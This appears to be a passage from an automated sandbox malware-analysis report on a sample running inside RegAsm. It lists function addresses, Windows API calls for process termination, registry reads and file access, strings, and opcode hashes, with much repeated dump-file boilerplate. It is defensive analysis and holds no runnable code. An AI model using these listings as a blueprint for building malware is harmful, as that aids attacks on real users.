                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78eb3c5714f9baed358a88d4a131b275a33a19604123cbf6b370464640c7e9bb
                                                    • Instruction ID: 3cd5e9df97ee95ede4c8092c02cc18a3c41fdf3835b732dad5b62155f70df75a
                                                    • Opcode Fuzzy Hash: 78eb3c5714f9baed358a88d4a131b275a33a19604123cbf6b370464640c7e9bb
                                                    • Instruction Fuzzy Hash: 3041CD766007419FD314CF18DA81A52FBE4FB84324F28466EE94687A62E77AFC51CB90
                                                    Function 00420255 Relevance: 6.1, APIs: 4, Instructions: 124COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,00420AC0,00000000), ref: 004202BA
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042030A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 4c528a2b4f9c7a333cd45075c52160f11a3634f4101dfcee3a1bace1474a4fb7
                                                    • Instruction ID: 25bdba633ebdef6c6ef92716bb38623e39aa572bfebf4df96f3e676e54faa8ae
                                                    • Opcode Fuzzy Hash: 4c528a2b4f9c7a333cd45075c52160f11a3634f4101dfcee3a1bace1474a4fb7
                                                    • Instruction Fuzzy Hash: 1B51A475E00208DFDB04DFA8D845BDDBBF4AF08314F10815AE825AB2A2D775A945CF68
                                                    Function 1FA4B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                    • Instruction ID: e1b5cb46acb41b1867c62e3eaf34ed631238d892634d7de4956471d2d86b3725
                                                    • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                    • Instruction Fuzzy Hash: 7131D275504B819FD320CB29E84069BB7E0FF89350F2C896DD8DA86A00E37DF488C791
                                                    Function 004135B9 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 00412F18: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00413607,00000000), ref: 00412F23
                                                      • Part of subcall function 00412F18: HeapAlloc.KERNEL32(00000000,?,?,00413607,00000000), ref: 00412F2A
                                                      • Part of subcall function 00412F18: wsprintfW.USER32 ref: 00412F3E
                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                    • CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                    • String ID:
                                                    • API String ID: 396451647-0
                                                    • Opcode ID: c7819af78da3aface2338669f5ee0cd5672e73affc262f33d1c25756492d632b
                                                    • Instruction ID: 48b4c925d865bfc27fdbfc8eca322732b18303721b05e3df4f914965bfc7d476
                                                    • Opcode Fuzzy Hash: c7819af78da3aface2338669f5ee0cd5672e73affc262f33d1c25756492d632b
                                                    • Instruction Fuzzy Hash: C8311675A00208EFDF10EFE0CD49BDDBBB9AB15305F204066F506EA2A0DB789A85CF45
                                                    Function 1FABCFE0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                    • Instruction ID: 0188c0ff71e1e5598781aceb7ffc58215d9731b7c2201c2ee7b2096e350c1d0c
                                                    • Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
                                                    • Instruction Fuzzy Hash: 3521D3756007059FD750EF68C980A5ABBF4EF98300F90087DF586C7211E339F6588B82
                                                    Function 1FC1F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1FC1F4E0
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 1FC1F4ED
                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1FC1F513
                                                    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1FC1F539
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: FilePointer$ErrorLast
                                                    • String ID:
                                                    • API String ID: 142388799-0
                                                    • Opcode ID: 458c6226e42038a89a900835fba55bda51d3b529219d47203d694f42dcd9b8a5
                                                    • Instruction ID: 49be01b492a95c7a5e284144f945a027f2aa982f355371577c9a89a1b98be0b7
                                                    • Opcode Fuzzy Hash: 458c6226e42038a89a900835fba55bda51d3b529219d47203d694f42dcd9b8a5
                                                    • Instruction Fuzzy Hash: 99112E7190811AFBDF119F56CC48DDE3F79EF00764F104144F928962A0D7329661FB90
                                                    Function 00413413 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(00416804,80000000,00000003,00000000,00000003,00000080,00000000,?,00416804,00000000), ref: 0041342E
                                                    • GetFileSizeEx.KERNEL32(000000FF,00416804), ref: 0041344A
                                                    • CloseHandle.KERNEL32(000000FF), ref: 00413457
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID:
                                                    • API String ID: 1378416451-0
                                                    • Opcode ID: d6cbb99f5314e23faf3fcb7a417c7da649c718395e1405f06033c3c258e6426e
                                                    • Instruction ID: b5f63f45aa5a973c207922594595ef1cee08961031f5671ccba5ec38916fb823
                                                    • Opcode Fuzzy Hash: d6cbb99f5314e23faf3fcb7a417c7da649c718395e1405f06033c3c258e6426e
                                                    • Instruction Fuzzy Hash: 1EF01D38A00208BBDB119F70EC09B8E7B76BB05755F21C261A551B51A0E7749B919B44
                                                    Function 00401055 Relevance: 6.0, APIs: 4, Instructions: 32memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401069
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401070
                                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0040108A
                                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004010A5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3676486918-0
                                                    • Opcode ID: be49e086dc0d310c657e0ea36b61225587a38021f968e5eb5576e45f00ae361c
                                                    • Instruction ID: 93c56868f345bbfa7cecc9d1a6a005eb9f7e7e5940340002480c40e87bd2faf3
                                                    • Opcode Fuzzy Hash: be49e086dc0d310c657e0ea36b61225587a38021f968e5eb5576e45f00ae361c
                                                    • Instruction Fuzzy Hash: AAF0F479A4020DBFDF01AFA0EC0AB9D7BBAFB06745F105061F611A91A0D7719A909B00
                                                    Function 00411C63 Relevance: 6.0, APIs: 4, Instructions: 31memorytimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,Version: ,00425200), ref: 00411C70
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411C77
                                                    • GetLocalTime.KERNEL32(?), ref: 00411C84
                                                    • wsprintfA.USER32 ref: 00411CB1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                    • String ID:
                                                    • API String ID: 1243822799-0
                                                    • Opcode ID: b01e69fe014143db8bda8cfbb55ef20ec2606d2adb4ae2357e78992565632fce
                                                    • Instruction ID: a03bda301cebd81dad816f1e8f5b399208d69082490908e68b74499f6324776c
                                                    • Opcode Fuzzy Hash: b01e69fe014143db8bda8cfbb55ef20ec2606d2adb4ae2357e78992565632fce
                                                    • Instruction Fuzzy Hash: 7FF0DAB9900119BFCB50EBE9DD09ABEB7FDBB0A746F001041FA41E5090E639CA90D771
                                                    Function 1FA3BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: string or blob too big
                                                    • API String ID: 0-2803948771
                                                    • Opcode ID: e84fd25352fc7f2c29ffb22f09f5233b7b8bc11affb23a01a674585df608cb3c
                                                    • Instruction ID: d527213490591a45371e23b726d4a7d72f7a3862bbf872775c16710b4ee4b298
                                                    • Opcode Fuzzy Hash: e84fd25352fc7f2c29ffb22f09f5233b7b8bc11affb23a01a674585df608cb3c
                                                    • Instruction Fuzzy Hash: 43A13775D08B868FD7048E2A8C40756B7D2AF8A322F181B5DF8A1473E1E77CE485CB91
                                                    Function 1FBA7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!.15g$-
                                                    • API String ID: 0-583212262
                                                    • Opcode ID: dc1494d6745a383f3205171fc4d3b2339f884954029a5074593761de272d05db
                                                    • Instruction ID: b9858daeaefeb2545c43ed182003ff6fd935d930d110e9ccb389e10f58c8237c
                                                    • Opcode Fuzzy Hash: dc1494d6745a383f3205171fc4d3b2339f884954029a5074593761de272d05db
                                                    • Instruction Fuzzy Hash: 9C915671A0C3468FD304CF6DD89179ABBE0EBC8304F54492DE989CB351E7B9D9098B92
                                                    Function 1FB478F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *$?
                                                    • API String ID: 0-2367018687
                                                    • Opcode ID: 9da71a3524c77659544f1d0f59fc65ef1df10318f96e009357288d1720866127
                                                    • Instruction ID: 978c43ab71f682fb3db8558fb6bc01b60924b34cccdcb51e43b8c9e790cf9cf3
                                                    • Opcode Fuzzy Hash: 9da71a3524c77659544f1d0f59fc65ef1df10318f96e009357288d1720866127
